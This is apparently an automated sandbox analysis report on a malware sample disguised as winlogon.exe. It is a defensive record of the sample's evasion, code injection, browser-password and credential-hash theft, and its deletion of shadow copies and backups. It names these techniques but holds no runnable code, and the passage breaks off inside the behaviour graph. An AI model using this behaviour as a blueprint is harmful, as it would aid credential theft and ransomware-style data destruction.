Source: C:\Users\user\AppData\Local\Temp\_usm.exeCode function: OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle,4_2_001412E8
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeThread delayed: delay time: 3600000
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Users\user\Desktop\winlogon.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exeDropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\_usm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\_usm.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\winlogon.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-13588
Source: C:\Users\user\AppData\Local\Temp\ucngw.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\winlogon.exe TID: 3392Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\yegus.exe TID: 3268Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\_usm.exe TID: 3300Thread sleep time: -3600000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wbengine.exe TID: 3492Thread sleep count: 89 > 30
Source: C:\Windows\System32\wbengine.exe TID: 3492Thread sleep time: -5340000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520Thread sleep count: 57 > 30
Source: C:\Windows\System32\vdsldr.exe TID: 3520Thread sleep time: -3420000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\vds.exe TID: 3548Thread sleep count: 81 > 30
Source: C:\Windows\System32\vds.exe TID: 3548Thread sleep time: -4860000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\vdsldr.exeLast function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Creates files inside the volume driver (system volume information)Show sources
Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup

Language, Device and Operating System Detection:

barindex
Contains functionality to create pipes for IPCShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D634B0 wsprintfW,CreateNamedPipeW,CreateEventW,CloseHandle,ConnectNamedPipe,GetLastError,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,GetOverlappedResult,CancelIo,CloseHandle,ReadFile,CloseHandle,1_2_00D634B0
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D74EF7 GetSystemTimeAsFileTime,1_2_00D74EF7
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeCode function: 2_2_100879B6 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_100879B6
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D65970 GetVersionExW,__Stoull,__Stoull,1_2_00D65970
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\winlogon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\winlogon.exeCode function: 1_2_00D6B6CE cpuid 1_2_00D6B6CE
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 46216 Sample: winlogon.exe Startdate: 12/02/2018 Architecture: WINDOWS Score: 100 56 252.0.0.224.in-addr.arpa 2->56 64 Antivirus detection for dropped file 2->64 66 Antivirus detection for submitted file 2->66 68 May disable shadow drive data (uses vssadmin) 2->68 72 3 other signatures 2->72 9 winlogon.exe 8 2->9         started        14 wbengine.exe 2 2->14         started        16 vdsldr.exe 2->16         started        18 3 other processes 2->18 signatures3 70 Tries to resolve many domain names, but no domain seems valid 56->70 process4 dnsIp5 58 8.8.8.8, 49408, 50225, 51075 GOOGLE-GoogleIncUS United States 9->58 60 192.168.2.238, 135 unknown unknown 9->60 62 8 other IPs or domains 9->62 48 C:\Users\HERBBL~1\AppData\Local\...\_usm.exe, PE32 9->48 dropped 50 C:\Users\HERBBL~1\AppData\Local\...\yegus.exe, PE32 9->50 dropped 52 C:\Users\HERBBL~1\AppData\Local\...\ucngw.exe, PE32 9->52 dropped 54 2 other files (none is malicious) 9->54 dropped 88 Contains functionality to inject threads in other processes 9->88 90 Contains functionality to inject code into remote processes 9->90 20 _usm.exe 9->20         started        22 yegus.exe 11 9->22         started        25 ucngw.exe 9->25         started        92 Creates files inside the volume driver (system volume information) 14->92 file6 94 Tries to resolve many domain names, but no domain seems valid 58->94 signatures7 process8 signatures9 27 cmd.exe 20->27         started        30 cmd.exe 20->30         started        32 cmd.exe 20->32         started        34 2 other processes 20->34 74 Contains functionality to steal Internet Explorer form passwords 22->74 76 Contains functionality to steal Chrome passwords 22->76 78 Tries to harvest and steal browser information (history, passwords, etc) 22->78 80 Contains functionality to dump credential hashes (LSA Dump) 25->80 process10 signatures11 82 May disable shadow drive data (uses vssadmin) 27->82 84 Deletes shadow drive data (may be related to ransomware) 27->84 36 vssadmin.exe 27->36         started        86 Uses bcdedit to modify the Windows boot settings 30->86 38 bcdedit.exe 1 30->38         started        40 bcdedit.exe 30->40         started        42 wbadmin.exe